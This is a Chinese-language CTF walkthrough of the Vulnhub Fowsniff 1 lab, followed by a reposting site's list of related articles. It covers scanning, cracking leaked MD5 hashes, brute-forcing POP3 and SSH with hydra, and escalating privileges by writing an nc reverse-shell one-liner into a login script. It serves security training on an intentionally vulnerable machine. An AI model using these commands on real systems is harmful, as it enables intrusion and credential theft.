Vulnhub:Fowsniff 1

news2024/11/23 3:28:34

靶机下载地址

信息收集

主机发现

nmap 192.168.31.0/24 -Pn -T4

靶机ip:192.168.31.134

端口扫描

nmap 192.168.31.134 -A -p- -T4

开放端口22(ssh)、80(http),和两个明文传输的邮件端口110(pop3)、143(imap)。

HTTP

访问http://192.168.31.134。

目录扫描。

dirsearch -u http://192.168.31.134

扫描出不少目录。

访问/security.txt,1337语言加密。1337(Leet)一种黑客语言,通常将英语中的字母替换为数字和特殊符号。

一个破解1337的简单python脚本。

str1 = input()
before = '0134567'
after = 'oieasgt'
table = ''.maketrans(before, after)     #创建映射表
print(str1.translate(table))

Fowsniff Corp被BigNinja入侵了!完全没用。

首页的下滑有一些文字,通过文字翻译知道Fowsniff的内部系统遭遇数据泄露,导致员工用户名和密码暴露,所有员工被指示立即更改密码。攻击者还劫持了官方@fowsniffcorp Twitter账户。

推特账户,用谷歌搜索,第一个就是。

置顶帖子的链接中给出了黑客获取的密码,不过链接404了。

在网上的wp中找到了链接中的内容。

以下是他们从数据库中获取的电子邮件密码。
​
他们的pop 3服务器也完全打开了!
​
MD5不安全,所以破解它们应该不难。
​
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e 

黑客dump的pop3邮件账户和密码,提示密码由MD5加密,找个网站解一下或者john破解。

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt lists.txt

# 查看
john --show --format=Raw-MD5 lists.txt

 

复制到pop3.txt中,用awk命令将用户名和密码分别存入username.txt和password.txt中方便后续使用。

cat pop3.txt | awk -F '@' '{print $1}' > username.txt
cat pop3.txt | awk -F ':' '{print $2}' > password.txt

渗透

爆破邮箱协议POP3

hydra -L username.txt -P password.txt pop3://192.168.31.134

seina:scoobydoo2

telnet登录POP3。

telnet ip port
user seina
pass scoobydoo2
# 列出所有邮件编码和长度
list
# 读取指定邮件 
retr 邮件编号
# 退出
quit

有两封邮件,邮件1内容如下:

Dear All,

A few days ago, a malicious actor was able to gain entry to our internal email systems. The attacker was able to exploit incorrectly filtered escape characters within our SQL database to access our login credentials. Both the SQL and authentication system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system overhaul. While the main systems are "in the shop," we have moved to this isolated, temporary server that has minimal functionality.

This server is capable of sending and receiving emails, but only locally. That means you can only send emails to other users, not to the world wide web. You can, however, access this system via the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my guidance. I saw the leak the attacker posted online, and I must say that your passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks, A.J Stone

大概内容是通知员工用SSH的临时密码S1ck3nBluff+secureshell登录,然后修改密码。

第二封邮件内容如下:大概是Skyler跟离开了一周的Devin的闲聊。

Devin,

You should have seen the brass lay into AJ today! We are going to be talking about this one for a looooong time hahaha. Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with you from your camping trip, but I think I'm coming down with it myself. How long have you been gone - a week? Next time you're going to get sick and miss the managerial blowout of the century, at least keep it to yourself!

I'm going to head home early and eat some chicken soup. I think I just got an email from Stone, too, but it's probably just some "Let me explain the tone of my meeting with management" face-saving mail. I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password. AJ had been telling us to do that right before Captain Profanity showed up.

爆破ssh

看看谁没修改密码,大概率是离开一周的Devin对应账户baksteen。

hydra -L username.txt -p S1ck3nBluff+secureshell ssh://192.168.31.134

baksteen:S1ck3nBluff+secureshell

远程登录ssh服务器。找到一条提示:"One Hit Wonder",昙花一现的歌手,不知道什么意思。

提权

内核提权uname -a

用44298。上传到靶机,发现靶机没有gcc无法编译exp,在本机上编译好试试,结果提示./44298: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./44298)。由此整个内核提权out!

看了wp知道需要找有写权限的文件。

find / -writable -type f -not -path "/proc/*" -not -path "/sys/*"  2>/dev/null

最可疑的就是/opt/cube/cube.sh

执行cube.sh会打印如下内容,这个页面是ssh连接成功时出现的页面,说明每次进行ssh连接成功时都会执行这个文件。

写入反弹shell。

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.121 4444 >/tmp/f

退出baksteen终端,攻击机nc监听4444端口,重新登录ssh。

get flag.txt!🎆

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2161224.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

云栖实录 | 阿里云 OpenLake 解决方案重磅发布:多模态数据统一纳管、引擎平权联合计算、数据共享统一读写

新一轮人工智能浪潮正在重塑世界,以生成式 AI 为代表的技术快速应用,推动了数据与智能的深化融合,同时也给数据基础设施带来了全新的变革与挑战。面向 AI 时代的数据基础设施如何构建?底层数据平台架构在 AI 时代如何演进&#xf…

word怎么加密?掌握这4种加密技巧,保护你的文件安全!

数字化办公社会,文档安全显得尤为重要。 无论是商业机密、个人隐私还是学术成果,我们都希望它们能在传递过程中得到妥善保护。 Word文档作为最常用的文档处理工具,用户有效保障文档的安全性是维护企业信息安全的重要渠道。 Word文档的加密是…

纯血鸿蒙APP开发启动页面无法全屏解决办法

先来看问题: 本身APP并不需要全屏,但是启动页这种特殊页面确实需要忽略页面上下的安全边界区域,解决办法也很简单,直接上代码: Image($r(app.media.launch_icon)) .width(100%) .height(100%) .expandSafeArea([SafeA…

mysql 重置密码

1.关闭mysql 服务 systemctl stop mysql.serivce 2.修改mysql的配置文件 /etc/my.cnf vi /etc/my.cnf#添加跳过登陆验证配置 skip-grant-tables 3.启动mysql systemctl start mysql.serivce 4.登陆mysql #进入到mysql的安装路径 cd /usr/local/mysql/mysql8.0/bin/ #登陆 …

SpringBoot文档管理系统:性能优化

第3章 系统分析 3.1 需求分析 在线文档管理系统主要是为了提高工作人员的工作效率和更方便快捷的满足员工,更好存储所有数据信息及快速方便的检索功能,对系统的各个模块是通过许多今天的发达系统做出合理的分析来确定考虑员工的可操作性,遵循…

windows桌面管理软件推荐:一键整理桌面!美化电脑桌面小助手!

windows桌面管理软件推荐来咯!在繁忙的工作和生活中,一个整洁、有序的电脑桌面不仅能提升工作效率,还能带来愉悦的视觉体验。然而,随着文件的增多,桌面往往变得杂乱无章。幸运的是,市面上有许多优秀的Windo…

CDGA|解锁数据价值:基础数据治理的至关重要性

在当今这个数据驱动的时代,数据已成为企业最宝贵的资产之一,其蕴含的价值远超传统资源。然而,要真正解锁数据的潜在价值,并非简单收集与存储即可达成,而是需要一套科学、系统的数据治理体系作为支撑。本文旨在探讨基础…

在idea里运行swing程序正常,但是在外部运行jar包却报错,可能是jdk版本问题

在idea里运行swing程序异常,报Caused by: java.awt.HeadlessException错误 System.setProperty("java.awt.headless","false");加上这句话

Spring Data Rest 远程命令执行命令(CVE-2017-8046)

(1)访问 http://your-ip:8080/customers/1,然后抓取数据包,使用PATCH请求来修改 PATCH /customers/1 HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MS…

Solidity——抽象合约和接口详解

🚀本系列文章为个人学习笔记,目的是巩固知识并记录我的学习过程及理解。文笔和排版可能拙劣,望见谅。 Solidity中的抽象合约和接口详解 目录 什么是抽象合约?抽象合约的语法接口(Interface)的定义接口的语…

Gooxi AMD Milan平台4U8卡AI服务器,兼具性能与成本的完美之选

近日,为了帮助企业从容应对当下多样化场景的算力挑战,Gooxi发布了基于AMD Milan平台的全新4U8卡AI服务器,在性能以及成本实现了完美平衡,并且在灵活性、稳定性、能耗方面实现了持续升级。 Gooxi AMD Milan平台4U8卡AI服务器是一款…

Pinia的快捷使用方法

安装Pinia npm install pinia 在main.js里面引入并注册挂载使用 在src下创建一个store inex.js // index.js import { defineStore } from pinia import { computed, ref } from vue //更简洁的的模块化 transferringValuesBetweenComponents simulationModule //简单定义了…

计算机毕业设计电影票购买网站 在线选票选座 场次订票统计 新闻留言搜索/springboot/javaWEB/J2EE/MYSQL数据库/vue前后分离小程序

系统功能 ‌在线选票选座‌:用户可浏览电影场次,选择座位并生成订单。‌场次订票统计‌:系统实时统计各场次订票情况,便于影院管理。‌新闻发布与留言‌:发布最新电影资讯,用户可留言互动。‌搜索功能‌&a…

python标识符和关键字

1、标识符 1.1 写法 标识符由字母、下划线和数字组成,且数字不能开头。严格区分大小写。不能使用关键字。 # 标识符由字母、下划线和数字组成,且数字不能开头。 # a_1_$ 1 # print(a_1_$)# 严格区分大小写。 # Animal 1 # print(animal)# 不能使用关…

Debezium

Debezium 是一个开源的分布式平台,用于捕获数据库变化数据(Change Data Capture, CDC)。允许用户实时地从数据库中捕捉到数据的变化(如插入、更新和删除操作),并将这些变化以结构化的数据流的形式提供给其他…

Python学习——【6.1】文件操作

【6.1】文件操作 一、文件的编码 问题:计算机只能识别0和1,那么我们丰富的文本文件是如何被计算机识别,并存储在硬盘中的呢? 答:使用编码技术(密码本)将内容翻译成0和1存入。 编码技术即翻译的…

邮件发送基础:深入SMTP协议、配置邮件服务器及Python实现

目录 引言 SMTP协议基础 定义与功能 工作原理 特性与优势 邮件服务器配置 第三方邮件服务商配置 自建邮件服务器配置 使用Python发送邮件 安装smtplib和email模块 发送简单纯文本邮件 发送HTML格式邮件 发送带附件的邮件 完整示例:发送带附件的HTML邮…

Figma 中要放大并下载 UI 设计中的图标

Figma 中要放大并下载 UI 设计中的图标,通常可以通过以下几步操作来实现: 1. 放大图标: 打开 Figma 文件并找到你想要放大的图标。 选中图标,点击界面右上角的 “缩放”工具(放大镜图标)&#xff0…

静态路由和默认路由(实验)

目录 一、实验设备和环境 1、实验设备 2、实验环境 (1)实验拓扑图 (2)实验命令列表 二、实验记录 1、直连路由与路由表查看 步骤1:建立物理连接并运行超级终端。 步骤2:在路由器上查看路由表。 2、静态路由配置 步骤1:配…

硬件看门狗导致MCU启动时间慢

最近,在项目交付过程中,我们遇到了一个有趣的问题,与大家分享一下。 客户的需求是:在KL15电压上电后,MCU需要在200ms内发送出第一包CAN报文数据。然而,实际测试结果显示,软件需要360ms才能发送…